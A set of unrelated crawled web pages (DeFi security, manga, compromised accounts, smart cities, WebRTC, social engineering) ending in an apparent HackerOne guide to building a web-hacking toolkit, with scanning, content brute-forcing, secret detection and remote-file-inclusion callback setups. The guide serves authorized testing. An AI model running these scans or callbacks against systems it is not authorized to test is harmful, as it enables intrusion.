contracts—self-executing contracts with the terms of the agreement directly written into code. While smart contracts can automate transactions and reduce the need for intermediaries, they also present security risks. Vulnerabilities in smart contract code can be exploited by attackers to manipulate or steal funds. Ensuring the security of smart contracts involves thorough code reviews, auditing, and testing to identify and address potential weaknesses. Decentralized Exchanges (DEXs): Decentralized exchanges, which facilitate peer-to-peer trading of digital assets without a central authority, are a core component of DeFi. However, their decentralized nature can make them more susceptible to security risks, such as front-running, liquidity issues, and hacking attacks. Securing DEXs involves implementing robust security measures, such as liquidity management strategies, transaction monitoring, and multi-signature wallets to protect user funds. Regulatory and compliance considerations: As DeFi platforms gain traction, regulatory and compliance considerations are becoming increasingly important. Ensuring that DeFi platforms adhere to relevant regulations and standards can help mitigate legal and security risks. This includes compliance with anti-money laundering (AML) and know-your-customer (KYC) requirements, which can help prevent illicit activities and protect users. Securing financial transactions is a multifaceted and ongoing challenge. As technology evolves, so do the methods and strategies used to protect sensitive financial information. By staying abreast of emerging trends and technologies—such as quantum cryptography, AI-driven security solutions, and DeFi security measures—organizations can better safeguard their financial operations against evolving threats.
<urn:uuid:dcdf3f63-16a0-40f3-b531-5620cda7cc69>
CC-MAIN-2024-38
https://www.divergeit.com/blog/financial-transaction-security
2024-09-14T15:03:06Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651579.38/warc/CC-MAIN-20240914125424-20240914155424-00612.warc.gz
en
0.922786
7,885
2.671875
3
Mangafreak Madness Japanese comics, commonly known as manga, have taken the world by storm, captivating audiences from diverse cultural backgrounds and influencing various aspects of global pop culture. From their unique visual style to compelling storytelling, manga has left an indelible mark on entertainment industries worldwide. The Rise of Japanese Comics (Manga) Mangafreak ‘s journey traces back to the late 19th century, with its roots in traditional Japanese art forms. However, it wasn’t until the post-World War II era that manga began to flourish, with the medium evolving rapidly to cater to different age groups and genres. Characteristics of Manga Manga boasts a distinct visual style. This style is characterized by exaggerated facial expressions. Dynamic action sequences are also prominent. Intricate details adorn the artwork. Mangafreak often employs unconventional storytelling techniques, such as nonlinear narratives and intricate plotlines, keeping readers engaged and intrigued. Influence of Manga on Global Pop Culture The impact of mangafreak on global pop culture extends beyond its home country of Japan, permeating various forms of media and entertainment. Many popular manga series have been adapted into anime, animated television shows or films, further expanding their reach and popularity among international audiences. Manga’s influence is prominently visible in cosplay culture, where fans dress up as their favorite characters from manga and anime conventions worldwide. Dedicated fan communities, both online and offline, play a crucial role in fostering a sense of belonging and shared enthusiasm for manga and its related content. Impact on Entertainment Industry Manga’s influence on the entertainment industry is evident through its significant contributions to box office successes and merchandising opportunities. Box Office Successes Numerous manga adaptations have achieved commercial success at the box office, attracting a diverse audience and generating substantial revenue. The popularity of manga has led to a plethora of merchandise, including toys, apparel, and collectibles, catering to fans’ desire to connect with their favorite series on a deeper level. Manga’s Role in Shaping Creative Industries Manga’s influence extends beyond its immediate medium, shaping creative industries around the world and inspiring creators in various fields. Influence on Western Comics Manga’s storytelling techniques and visual aesthetics have influenced Western comics, leading to a cross-pollination of ideas and styles in the comic book industry. Inspirations in Film and Television Manga adaptations have also inspired filmmakers and television producers, resulting in live-action adaptations and thematic influences in mainstream media. Global Reach and Localization The globalization of manga has necessitated extensive translation efforts and cultural adaptations to make the medium accessible to international audiences. Dedicated teams of translators work tirelessly to translate manga into multiple languages, ensuring that fans worldwide can enjoy their favorite series. Manga publishers often make cultural adaptations to localize content for specific markets, ensuring that nuances and cultural references are accurately conveyed to readers. Manga’s Evolution in the Digital Age In recent years, manga has embraced digital platforms, with webtoons and online manga readers gaining popularity among readers worldwide. Webtoons and Online Platforms Digital platforms offer a convenient and accessible way for fans to read manga, with features such as online subscriptions and mobile apps enhancing the reading experience. Social Media Engagement Manga publishers and creators actively engage with fans through social media platforms, fostering a sense of community and providing updates on new releases and events. Controversies and Criticisms Despite its widespread popularity, manga has also faced criticism and controversies, particularly regarding its depiction of gender roles and instances of cultural appropriation. Depiction of Gender Roles Some manga series have been criticized for perpetuating gender stereotypes and portraying female characters in a sexualized manner, sparking debates about representation and diversity in the medium. Manga is global appeal has raised concerns about cultural appropriation, with creators and publishers facing scrutiny over their handling of cultural themes and references. The Future of Mangafreak Madness As manga continues to evolve and adapt to changing technologies and audience preferences, the future of the medium appears bright, with opportunities for expansion and innovation on the horizon. Expansion of Market The global demand for manga shows no signs of slowing down, with emerging markets and digital platforms contributing to the medium’s continued growth and popularity. Innovation in Storytelling Creators are constantly pushing the boundaries of storytelling in manga, experimenting with new genres, art styles, and narrative techniques to captivate audiences and keep the medium fresh and exciting. In conclusion, the influence of Japanese comics, or manga, on global pop culture is undeniable. Manga originated in Japan. It has gained immense popularity worldwide. Manga transcends cultural boundaries. It captivates millions of fans globally. The medium constantly evolves. It adapts to new trends and technologies. Manga influences entertainment industries. It sparks creative expression. Its impact continues to expand. The future growth of manga is promising. Is manga only popular in Japan? No, manga enjoys a global fanbase, with readers and enthusiasts from all over the world. What makes manga different from Western comics? Manga often features distinct visual styles and storytelling techniques that set it apart from Western comics. Are all manga series suitable for all ages? No, manga encompasses a wide range of genres and target demographics, with some series specifically aimed at adult audiences. How can I start reading manga? There are many online platforms and local bookstores where you can purchase or read manga, depending on your preferences. Are there any legal concerns associated with reading manga online? While there are legal platforms where you can read manga online, it’s essential to support creators and publishers by accessing content through legitimate channels.
<urn:uuid:86bb539a-fe52-4530-ba60-43949ff6ab5e>
CC-MAIN-2024-38
https://diversinet.com/mangafreak-madness-and-its-impact-on-global-pop-culture/
2024-09-15T21:20:56Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651647.78/warc/CC-MAIN-20240915184230-20240915214230-00512.warc.gz
en
0.918182
1,198
2.703125
3
Enterprise Password Management Guide Passwords are used in many ways to protect data, systems, and networks. For example, passwords are used to authenticate users of operating systems and applications such as e-mail, labor recording, and remote access. Passwords are also used to protect files and other stored information, such as password-protecting a single compressed file, a cryptographic key, or an encrypted hard drive. In addition, passwords are often used in less visible ways; for example, a biometric device may generate a password based on a fingerprint scan, and that password is then used for authentication. This publication provides recommendations for password management, which is the process of defining, implementing, and maintaining password policies throughout an enterprise. Effective password management reduces the risk of compromise of password-based authentication systems. The attached Zip file includes: - Intro Page.doc - Cover Sheet and Terms.pdf - Enterprise Password Management Guide.pdf
<urn:uuid:f687e9cc-ff56-4396-a063-2f3c4e383846>
CC-MAIN-2024-38
https://www.itbusinessedge.com/it-management/enterprise-password-management-guide/
2024-09-15T19:49:38Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651647.78/warc/CC-MAIN-20240915184230-20240915214230-00512.warc.gz
en
0.914237
192
3.0625
3
Types of compromised accounts Email, social media, and business accounts are the most common types of compromised accounts, and they pose a big risk to sensitive data. Email accounts can be used to reset passwords for different applications, leading to privilege escalation1. When an email account is compromised, attackers can gain access to institutional data, confidential information, and personally identifiable information. Phishing attacks are the primary way email accounts are compromised, and businesses with no protection are at high risk. Social media accounts Even social media accounts with no access to sensitive data are valuable to hackers as they can provide access to personal information, which can be used for identity theft and fraud. Compromised social media accounts may display unexpected updates, and users should look for unusual activity on their accounts. Moreover, using the same password for multiple accounts can put all of a user's accounts at risk of compromise, not just their social media accounts. Financial accounts are targeted because they contain sensitive information like credit card numbers and bank account numbers that can be used to commit fraud or make purchases without permission. Again, phishing scams are a common tactic used by attackers to get people to give them their login information. How are accounts compromised? Accounts are compromised in various ways, but phishing attacks and credential theft attacks are very common. Phishing attacks are the most common path to a data breach. Attackers use fake emails and domain names to trick users into giving up their login information. Accounts can be compromised if they use a weak password, if a malicious third party has access to them, if they have a virus or malware, or if they are on a network that has been hacked. Credential stuffing attacks In a credential stuffing attack, attackers use automated tools to test a list of stolen usernames and passwords on multiple websites, because many people use the same username and password combination on more than one platform. When attackers find credentials that work, they can steal sensitive information or raise their privileges to get to even more important data. It is critical that people use a unique, strong password on every website, app, or account they use. Arkose Labs $1 Million Credential Stuffing Warranty Guarantees Success Against Volumetric Credential Stuffing Attacks $1M Credential Stuffing Warranty How to Spot Compromised Accounts Being able to spot a compromised account is crucial for preventing any damage that might occur. To spot a compromised account, businesses should monitor any suspicious activity, such as unfamiliar login locations, new devices or IP addresses, or unexpected changes in account settings. Unusual outbound traffic As they collect information, attackers will slowly send data to an outside network. The transferred data will show that outbound traffic is higher than usual, especially during off-peak hours. Unusual user activity on sensitive data Users with high privileges often access sensitive data in a predictable way, such as at a certain time or on a certain day. In a breach, an attacker might exfiltrate company data on unusual days or times. Network requests from unusual geolocations VPN or network access from unusual locations or a suspicious IP address could indicate an account compromise. Increased failed authentication requests During a brute-force attack, failed login attempts are detected, and account lockouts will stop these authentication attempts. But an attacker will keep trying other user accounts until they find a compromised account with credentials that work. Increased access attempts on important files Attackers may try to gain access to files that contain trade secrets and intellectual property. Unusual configuration changes Many times, attackers change system configurations to provide a backdoor for persistent access. Increased device traffic to a specific address Compromised networks and devices could become part of a botnet used in a distributed denial-of-service (DDoS). Consequences of a compromised business account Attackers often target high-privileged accounts, or the accounts of key employees, in spear-phishing attacks to gain access to sensitive business information. When successful, attackers may carry out CEO fraud, also called "whaling," data exfiltration, or install ransomware. Any of these can be devastating to a business, its employees, and its customers. Compromised business accounts can provide a way for malicious actors to impersonate legitimate employees or executives and attempt to defraud the company. This type of attack, known as CEO fraud or "whaling," can cause devastating financial and reputational damage to businesses. Companies can train their employees on how to recognize and avoid phishing emails and other types of social engineering attacks that can lead to compromised accounts. Data exfiltration is the unauthorized copying, transfer, or retrieval of data from either a server or an individual’s computer. Methods of data exfiltration include database leaks, network traffic, file sharing, and corporate email. Organizations with high-value data are particularly at risk of data exfiltration, either from outside threat actors or trusted insiders or employees. Ransomware encrypts a company's own data and prevents access to it. Most of the time, attackers try to blackmail an organization by making it pay a ransom to get its own data back. If the company doesn't pay the ransom, an attacker might threaten to publicly expose the data. How Arkose Labs Can Help The old axiom about the best offense is a good defense certainly applies to compromised accounts. Arkose Labs bot management solution combines detection with targeted attack response to catch fraud early in the customer journey, without impacting good users. Fraud and security teams gain the advanced detection power, risk insights, and option for user-friendly enforcement they need to prevent compromised accounts due to phishing attacks and credential stuffing attacks. In fact, we’re the only company with a $1 Million Credential Stuffing Warranty. To learn more, book a demo today!
<urn:uuid:65a1185d-1a08-41a7-837e-63e27fea1551>
CC-MAIN-2024-38
https://www.arkoselabs.com/explained/what-is-a-compromised-account/
2024-09-17T02:08:34Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651722.42/warc/CC-MAIN-20240917004428-20240917034428-00412.warc.gz
en
0.923503
1,198
2.984375
3
Authentication, Authorization and Accounting – A functional description of a type of security architecture for a network. When people refer to a AAA System or a “Triple A” system, they are referring to a kind of system that has control over: - Authentication – Is the user who we think they are and are they allowed into our system - Authorization – Which users have access to which services which and how many resources can be allocated to each user - Accounting – tracking the actual usage by the user “Triple A” systems are generally considered to be secure.
<urn:uuid:fdec74c3-a9fe-49ef-b7c9-b5125f9cb9f5>
CC-MAIN-2024-38
https://alefedge.com/glossary/aaa/
2024-09-19T13:47:41Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652031.71/warc/CC-MAIN-20240919125821-20240919155821-00212.warc.gz
en
0.969945
119
2.609375
3
Construction of smart cities in India overlooks various difficulties owing to the alteration in the political environment, statistics, economic composition, to name a few. Smart City is a new translation of an upper-level Urban Collection. By building smart cities, the country is trying to recreate a better example for the living and also to solve the problems which have been produced in the means of continuous human occupancy. Varying from state to state, nation to nation because of the difference in the Economic Structure, Demographics, Technology, and Political Environment, Smart cities could both be Greenfield (start anew) or Brownfield (on existing ones) projects where difficulties are different in both the circumstances. The Brownfield plan or the cities with surviving infrastructure profess various socio-economic difficulties and significant dilemmas related to urbanization like the immigration from rural population to towns. Growth of urban community resulting in reduction of living spaces, many environmental concerns e.g. pollution (air, water, sound, radiation); controllable issues in depletion of natural resources; restraint in utility services (Electricity, Water quantity, Gas, etc.); problems of civic facilities (roads, waste, sanitation, sewerage, solid garbage), including growing number of social issues like crime, suicide, etc. The Greenfield project or building a futuristic Smart city from ground-zero will pose a diverse challenge of discovering reason on why and how a migrant community could be supported by providing not just amazingly done concretized foundation and some hi-tech amenities but also will challenge providing a significant option for maintenance or earning and by implementing better facilities for relocation. Experts are pondering over the questions as to what will be there in a Smart City. Or what they will gain through a Smart city? Well, the answers lie in higher efficiency and optimization of the support and assistance in a comprehensive approach. The aim is to achieve a greater “quality of life,” a distinguished rank in the HDI Human Development Index. Urban dwelling in Smart cities should mean the usual cost-effective way for a citizen to gain all sorts of services at the highest attainable performance. A proper system and process shall drive the complete town and its services with insignificant discretionary authorities for decision. At the same time, the method should be able to exterminate the limitations which most citizens face today by maximizing the coveted factors which include better living standards, and excellent services, alongside minimizing undesired items. For instance, Mumbai Health Authority will be capable of getting data in their IMS (Incident Management system), ready with the command and administration Centre of Mumbai Police. In case of a crisis when a heart patient is calling assuming he is suffering an attack, through the smart resolutions the hospital will be able to point the specific patient area which will be arranged on a GIS map automatically so that speedy aid /ambulance can visit him in shorter than 5-15 minutes. But the question remains as to how these Smart cities will be constructed, and what will be the technology used? The Smart Cities will incorporate the utilization of data and communication technology, as well as reliable energy technologies, for the more effective management of municipal services or E-governance assistance which can be from government to governments or government to citizens. The building of a smart city covers a combination in the areas of energy management, for instance, smart grid, water management for storage, urban mobility in the form of intelligent transport, united healthcare, smart education, public protection & security, to name a few.
<urn:uuid:4c287018-c46b-46e8-aeb4-34085d1b467a>
CC-MAIN-2024-38
https://www.mytechmag.com/smart-cities-are-reconstructing-the-indian-panorama/
2024-09-08T15:21:46Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651013.49/warc/CC-MAIN-20240908150334-20240908180334-00376.warc.gz
en
0.932828
708
2.953125
3
WebRTC burst onto the scene in 2011 and generated a huge buzz. Everyone talked about how revolutionary it would be, how it was “going to explode,” and “change everything!” But a lot of the stuff I read didn’t explain how that was going to happen, or what WebRTC actually is. Now that it’s being implemented widely, I’ve noticed more discussion about it. Still, this discussion did little to provide clarity for users that weren’t developers. In today’s blog post I’m going to decode and explain WebRTC. What is it? WebRTC stands for Web Real Time Communications. Essentially, WebRTC is an API that allows users to make and receive voice and video calls through a web browser. This initiative is supported by Google, Mozilla, and Opera. Their joint mission statement, as quoted from their website is “To enable, rich, high-quality RTC applications to be developed for the browser, mobile platforms and IoT devices, and allow them all to communicate via a common set of protocols.” Like any revolutionary technology, there are a lot of challenges as well as benefits. How does it work? Without getting too technical and simply put, think of a voice or video call using WebRTC in terms of steps. - Call is initiated by Side A - Call needs to pass through Side A’s Firewall and NAT - Call needs to find the person being called (Side B) - Signal needs to pass through Side B’s Firewall and NAT - Now the voice and video need to travel in both directions, in real time. Essentially, there is a lot going on and a lot of pieces that need to work together. A WebRTC call is basically like getting from point “a” to point” b” by crawling under barbed wire and over a wall during a hail storm. The internet isn’t perfect. No one owns it, therefore there are few guarantees and not a lot that can be done to control the quality of service. This is what made WebRTC such a challenge. Thanks to STUN, TURN, and ICE your WebRTC call will get through the hail storm and then some. Session Traversal Utilities for NAT (STUN) helps find a host’s (caller or call recipient) IP address when it is behind a NAT/Firewall. When an incoming call comes it, STUN provides the public IP address, if this does not pass through then the Traversal Using Relay around NAT (TURN) comes in and establishes the connection. ICE simply refers to the standard that coordinates STUN and TURN. What makes it great? WebRTC is implemented using an API, so naturally this makes it easy to plug in regardless of web browser, operating system, or device. The API is also free and open source, so nothing needs to be created from scratch-saving developer’s time. However, it still requires a high-level of expertise and understanding to implement. Feature-wise WebRTC has a lot to offer: one-click calling, encryption of voice and video (with SRTP). You can also hear everyone more clearly thanks to excellent noise cancellation. IPVideoTalk: How Grandstream is making WebRTC work for you WebRTC is a fascinating, convenient technology that makes meeting and connecting easier than ever. Grandstream Networks created IPVideoTalk, a video, audio, and web conferencing service allowing users to join from anywhere. Any meeting hosted on a GVC (video conferencing hardware system) can be turned into an online meeting that can be joined in one-click from a WebRTC capable browser. Have a GVC and want to check it out? Start a free trial today! Sign up here.
<urn:uuid:047db180-7708-483d-b065-91a18ec873d8>
CC-MAIN-2024-38
https://blog.grandstream.com/company/news/blog/decoding-webrtc
2024-09-09T21:03:41Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651157.15/warc/CC-MAIN-20240909201932-20240909231932-00276.warc.gz
en
0.954648
812
2.921875
3
Although the word “social engineering” might not sound very hazardous, this sort of attack is wrecking chaos in all the exploits it comes across. The basic difference between this cyber threat and others is that the execution is based on humans rather than an unpatched system vulnerability. But what exactly is a Social Engineering attack, and how can we avoid becoming a target? What is Human Hacking/Social Engineering attack? What are its impacts? Social Engineering is a technique that exploits humans using psychological manipulation and getting access to privileged information. It is also known as “Human Hacking.” They manipulate the users by showing a sense of urgency and fear of similar emotions leading the victim to leak the information to the attacker via call, email, or clicking on a link. First, the attacker gathers information on the victim using passive information gathering, dumpster diving, shoulder surfing, or others. Then, the attacker impersonates to gain confidence and gives urgent instructions for the subsequent steps. Then, the attacker exploits the victim by sabotaging or stealing some information or money. And after this, the last step is removing the traces and disengaging from the victim. The traces are hard to find as they use different tools and try to avoid logs as much as possible. In this attack, the victim is not a machine, but a human and is the weakest link due to emotions, lack of knowledge of personal data, and pressure. Read on to find out the types of these attacks and how you can prevent them from happening. What are the various Social Engineering attacks? Social Engineering is a broad term and has many different attacks within it, as mentioned: It attempts to access privileged information such as passwords, card details, PINs, and Personal Identification details like Driving Licence, Social Security Numbers, Passport Details, and others. It mainly involves the user clicking on links to malicious websites, replicas of original websites, or opening any attachments containing malware. It involves the attacker making a false promise to the victim to lure them into a trap. It can involve the attacker in sharing the user’s details for a “Free” offer. Vishing attacks involve the attacker connecting with the victim on a voice call and showing a sense of urgency to share details on a call. It is the same as vishing, but the method or the targeted attack medium is SMS instead of a voice call. An attacker can send you an SMS with some suspicious offer or a link that shows the urgency to share your details to access your private information. How can you detect Social Engineering attacks? Detection of Social Engineering Attacks is also essential, so you should always be attentive to what information you share with anyone. Here are a few quick tips that you can follow to detect such human attacks. - Whenever you are giving any information, make sure that the sender is legitimate and check the email address/phone of the concerned. - If a friend asks for the information, then always try to give them a call to confirm the need. - If you are visiting a website, check the URL and spelling errors. You can even check how the website reacts if you give false credentials. - If there is an offer, then always consider whether it is too good to be true, whether the links are suspicious, if the message has a sense of urgency, and so. Suggested Reading: 4 Tips How To Stay Safe Against Ransomware How can you avoid Social Engineering attacks? Social engineering is quite common now, and knowledge of such attacks must be shared with every citizen. There are many habits that one can follow, such as: - Everyone must receive proper education as awareness is the first step to prevention. - Always use multi-factor authentication. - Always use strong passwords. - Keep changing the passwords periodically. - Don’t maintain an online-only friendship. - Don’t share your Wi-Fi credentials with everyone. - Use a proper antivirus as they use machine learning to detect social engineering attacks. - Verify details of an employee from the company before sharing any information. - Check for data breaches of your accounts periodically so that you can change the credentials of that account or the one with similar passwords. It’s time to fight the Human Hacks Because social engineering is more than any other threat, it is tough to tackle. Use these strategies to help defend yourself and your organization against this human hack. If you want to go deeper into your industry’s security posture, ACE offers various free consultations to give you a detailed overview of your IT system’s weaknesses. It’s time for us to face the seriousness of this cyberthreat and take proactive measures to combat it. It’s time for us to understand the severity of this cyberthreat and take proactive steps to combat it.
<urn:uuid:d404aa54-9ef3-4751-84c6-1c2cdbd8e0f8>
CC-MAIN-2024-38
https://www.acecloudhosting.com/blog/social-engineering-attacks/
2024-09-09T20:55:36Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651157.15/warc/CC-MAIN-20240909201932-20240909231932-00276.warc.gz
en
0.939411
1,001
3.21875
3
Web hacking is the most common type of security testing in pentests and bug bounty programs. Getting started can be really daunting, and having a solid environment set up with tools that cover many different areas of web hacking helps. A Note on Operating System (OS) / Distros One of the first things people get caught up on when they start hacking is "which distro should I use?" Most, if not all, hacking tools work on any Linux / Unix operating system and are written in high-level, cross-platform languages like Python, Java, Golang, and Ruby, which will work on any OS. For the purpose of this article, using a Debian-based Linux distribution such as Kali, Ubuntu, or ParrotOS will make the setup more convenient; otherwise, don't get caught up on distro choice, just get started with whatever is most convenient for you. It won't make much of a difference as long as you start hacking. For security purposes, you may wish to set up a Virtual Machine (VM) for web hacking locally. A VM will ensure that your host machine remains secure, and you can replicate your hacking environment easily by cloning a VM. You can follow the Kali Linux setup documentation for VirtualBox, VMWare, and UTM (on Mac) for VM setup. Local vs. Cloud environments Your hacking environment can be set up locally, or in the cloud using a VPS (Virtual Private Server). A VPS is a server that you rent in the cloud, with any OS you want, root access, and very fast internet speed. You should run some tools locally for faster interactivity, such as those with a GUI that you often interact with; others, such as scanning and enumeration tools, might be faster on a VPS (since the data centers they sit in have much faster internet), so that you can leave them running overnight or days on end in something like a tmux window. Having a VPS also means you have a reachable server on the internet to receive callbacks such as reverse shells and out-of-band HTTP and DNS requests. Setting up a VPS is not expensive; you can rent one for about $10 per month. We recommend a hybrid approach where you have all of the tools available in a local VM, with a VPS server available to install and run tools anytime. At the end of the day, methodology, skill, and experience matter more than the tooling. This article tries to introduce tools that would be useful to different hacking methodologies and introduce you to ways of finding bugs that have good coverage. When you're just starting out, tools guide you and teach you; but as you get more comfortable with hacking, you will be the one customizing and guiding the tools to achieve creativity in your own testing. This article won't go too deep into the advanced usage of each tool, but just enough to get you started. The hacking environment can also include extra resources that aren't so much hacking tools but help you manage tasks, keep track of notes, and give you ideas when you're stuck, such as note-taking apps, methodology handbooks, and payload cheatsheets. Those "soft resources'' can make all the difference to keep you going. Note-taking and Text Editors Good note-taking is essential for tracking progress when hacking a web application. One of the most popular ways to take notes while hacking is to use markdown note-taking apps, which provide a simple syntax for highlighting, and denoting code snippets and TODO items. There are many popular markdown-based note-taking apps, such as Obsidian, Notable, and Joplin. Pick one that works for you and stick with it - jumping around could be distracting and lead to data loss. Heynote is a different kind of note app that's more of a "scratch pad" with one continuous buffer with syntax highlighting; you can add new snippets to it and use it as a space to store and edit payloads. Having pen, paper, and sticky notes around the desk can also help those that are more inclined to physical note taking and drawing mind maps. Handbooks And Cheatsheets There will always be times when you are testing a web app, and you get stuck, run out of ideas, or don't know what to do next. That's why there are some handy resources that you should keep locally as a reference guide. Simply download the PDFs, copy them into the Documents folder for safekeeping, and add the URLs into your bookmarks: Web Request Interceptors Let's get into the "hard" tools themselves. A way to inspect, intercept, and manipulate HTTP requests with a proxy is essential to web hacking. The three most popular tools for web request interception are Burp Suite, Caido, and OWASP ZAP; the de facto is usually Burp. Good news - when new hackers reach at least a 500 reputation on HackerOne and have a positive signal, they are eligible for 3 months free of Burp Suite Professional. Setting Up Burp If you're using Kali, Burp Suite Community version is already installed by default. If it isn't, you can install it by running: apt update; apt install burpsuite (run any "apt" related commands as root by adding "sudo" in front of it or by having a root shell) On other systems, I recommend downloading Burp from PortSwigger's official website to get the latest version. On Linux, it will download as a .sh file that you can run to install it. Once it's installed, open up Burp, fire up a new project, and go to the "Target" tab; there, you will find an "Open browser" button that already has the proxy configured to forward traffic to Burp. Now you can start browsing to target websites and seeing the traffic come in! You may also wish to go into Burp -> Settings and search for the word "dark," then enable dark mode in the display settings: Setting Up Burp Extensions: Autorize There's a large number of extensions available in Burp built by the community. Portswigger even has a blog on the best Burp extensions. Here we will cover how to set up Autorize, one of the best extensions that helps you find authentication (authn) and authorization (authz) related vulnerabilities such as IDORs and broken access control bugs. Go to the Extensions tab, and then open the BApp Store. Here you will find a list of extensions available to be installed. Search "autorize", and click on the entry. Since Autorize is an extension written in Python, you will need to download Jython and configure Burp to use it in order to run Python extensions. Click on "Download Jython" and download the standalone version. Now you must configure Burp to use the Jython jar file we downloaded. Go into Burp -> Settings again, and search Jython. In the Extensions area, we can choose "Select file" next to "Location of Jython standalone JAR file" and choose the file we just downloaded. Now close the settings, go back to the Extensions tab, and click on Autorize again. This time you should be able to click the "Install" button: After installing, there should be a new Autorize tab at the top. Go there and click on "Autorize is off" to toggle it on. When you browse to any authenticated or unauthenticated pages, Autorize will now send a separate unauthenticated request to test for a bypass: For example, some of the graphql requests on HackerOne allow querying without authentication and therefore show up as "Bypassed" on Autorize. Others show as enforced, for example, a request to view the user's own profile will return a different response when unauthenticated. There are many more awesome Burp extensions that you can install — have a look at this larger list. Recon & Discovery Good recon is half the win; therefore, we outline different areas of tooling setup for each basic type of reconnaissance for web hacking. Note that tooling is constantly evolving, and this is not an exhaustive list by any means; it's just to get you started. For the purpose of this guide, we are skipping the usual asset discovery tools (such as subdomain enumeration and port scanning) to focus on web applications; for an introduction to asset discovery, you can read this blog from HackerOne. For service and content discovery tools that run on the command line, you may wish to spin up a small VPS (Virtual Private Server) in the cloud for running those scans since it would return results a lot faster, especially if you are scanning horizontally across a lot of targets. When you start testing a web app, you want to get a good feel of what kind of technology stacks it's built on. One way to do this in the browser is via a tool called Wappalyzer, which passively analyzes the website as you browse to detect technologies in use. You can use the extension for Firefox here or the Chrome webstore. For example, Wappalyzer just detected that hackerone.com is using Drupal 10 and MariaDB. Service and Vulnerabilities To further discover what might be running on a web app and what known vulnerabilities it may have, a powerful scanner like nuclei is essential for your hacking environment. You can install nuclei by running: apt install nuclei You should run Nuclei at least once initially (just invoke on the shell with nuclei) so that it can install and update nuclei-templates, which are scanning modules written by ProjectDiscover and the wider community. It includes a wide range of scans to detect various technologies, extracting version numbers, finding exposed admin panels, and scanning for known CVEs. This is how you can run nuclei to scan for known web-based CVEs: nuclei -target https://example.com -t http/cves/ Or run a workflow specifically targeting Drupal websites using a workflow: nuclei -target https://example.com -w workflows/drupal-workflow.yaml The two popular techniques of content discovery are spidering and directory brute forcing, and we'll get tools to do both of those things. It's written in Go, like a lot of fast hacking tools. Let's set up Go in our environment so that we can install Go-based tools quickly in the future. First, run apt install golang -y on your terminal. Then open your ~/.bashrc file in a text editor and add the following lines: export GOROOT=/usr/lib/go | Now reload .bashrc by running source ~/.bashrc This will configure your PATH variable so that your shell can find golang tools installed on your system. You can now install gospider via the go install command: GO111MODULE=on go install github.com/jaeles-project/gospider@latest For effective directory brute forcing, you need good wordlists. On Kali, there are a number of preinstalled wordlists in /usr/share/wordlists; however, better word lists, such as ones from wordlists.assetnote.io and the SecLists collection can be used. Wordlists from AssetNote are generated based on categories and use cases. Having a self-maintained ~/wordlists directory is a good idea, as you can use it to store all of your own wordlists separate from what Kali has (and you can download AssetNote wordlists based on the target and your needs) mkdir ~/wordlists; cd ~/wordlists git clone --depth=1 https://github.com/danielmiessler/SecLists wget https://wordlists-cdn.assetnote.io/data/automated/httparchive_subdomains_2024_01_28.txt | This is how to use feroxbuster with the wordlists downloaded from AssetNote: feroxbuster --url https://example.com --wordlist ~/wordlists/httparchive_apiroutes_2024_01_28.txt Generating custom wordlists based on each web application helps with discovering hidden paths that default wordlists don't contain. Now that we've set up golang, we can install golang tools easily, such as cook, which is an advanced wordlist generation tool: go install -v github.com/glitchedgitz/cook/v2/cmd/cook@latest Cook can be used during testing when interesting keywords and patterns and found to generate wordlists with a combination of words, separators, and file extensions: Static Analysis Tools An often overlooked area for web application testing is static analysis of source code. Both client-side and server-side source code can reveal interesting things about the web application that dynamic testing simply does not cover. This includes exposed secrets in source code such as API tokens and passwords, dangerous function calls that lead to XSS, template injection, or unsafe deserialization bugs. Semgrep can be easily installed as a Python3 pip module: pip3 install semgrep You can then use semgrep's publicly available rulesets (ci and owasp-top-ten) to scan a code base, and go through its findings: semgrep -c p/ci -c p/owasp-top-ten . Trufflehog can detect secrets in a variety of places, including source code, S3 buckets, git repositories, and so on. Furthermore, it has built-in verification capabilities that can verify if a secret is valid or not by hitting the service API (for example, getting the username from a leaked GitHub token or ARN from an AWS key). Trufflehog has its own installation script that you can run (or you can manually download it from releases): curl -sSfL https://raw.githubusercontent.com/trufflesecurity/trufflehog/main/scripts/install.sh | sh -s -- -b /usr/local/bin | To scan a file with trufflehog, simply download the script and run trufflehog. wget https://example.com/scripts/example.js | Sometimes you might get lucky and come across web applications that have binaries available (such as DLL or JAR files) or have a docker image on Docker Hub that contains those files. In those cases, you may need decompilers. The two most common languages that web applications use that are also usually compiled are Java and C#. To install those languages on your Kali, you can run: apt install mono-complete default-jdk To decompile Java, you may want to download these decompilers and keep their JAR files handy for later: You can run JD-GUI like this:: java -jar ~/Downloads/jd-gui-*.jar Out-of-band Testing Tools For some vulnerabilities, such as Blind XSS, XML External Entity injection, and Remote File Inclusion, you may need a URL that's internet-exposed to receive the callback payload. For general DNS or HTTP callbacks, you can use interasch, which will provide a random endpoint you can include in payloads. When it receives an interaction, it will provide the full HTTP and DNS request, including all headers and source IP addresses: Another tool you can use for XSS callbacks that require signup is bxsshunter. It allows you to create and generate callback links as well as automatically generate payloads for testing: An open-source, self-hosted alternative is xsshunter, but that requires hosting on a cloud Virtual Private Server (VPS) and a registered domain name, so we're leaving it as an exercise to the reader. Sometimes you might need to expose a web server with some files for the web application target to download or interact with, such as for testing Remote File Inclusion (RFI). In that case, having a reverse tunnel from localhost to the internet can allow you to quickly set up a callback for any arbitrary web service. You can download cloudflared from its GitHub releases for this purpose. For example, you may wish to host a PHP file for the target web application to include and run. On one terminal, create the file and start a Python web server on port 8000: echo '<?php phpinfo(); ?>' > info.php | On another terminal, spin up a Cloudflare tunnel: cloudflared tunnel --url http://localhost:8000 | Now you can use your fresh Cloudflare URL to access the info.php file: There's a lot covered here, but don't fret — setting up a good environment for web hacking isn't meant to be a quick job; it takes effort, persistence, and time for you, the hacker, to get used to your environment as much as it gets more suited to your skills and style. It's a two-way symbiosis, as you grow into your tools and your tools grow with you; all you have to do is start and not stop. The Ultimate Guide to Managing Ethical and Security Risks in AI
<urn:uuid:8d091df9-c310-4f4d-9913-41e07dc0e885>
CC-MAIN-2024-38
https://www.hackerone.com/ethical-hacker/setting-up-web-hacking-environment
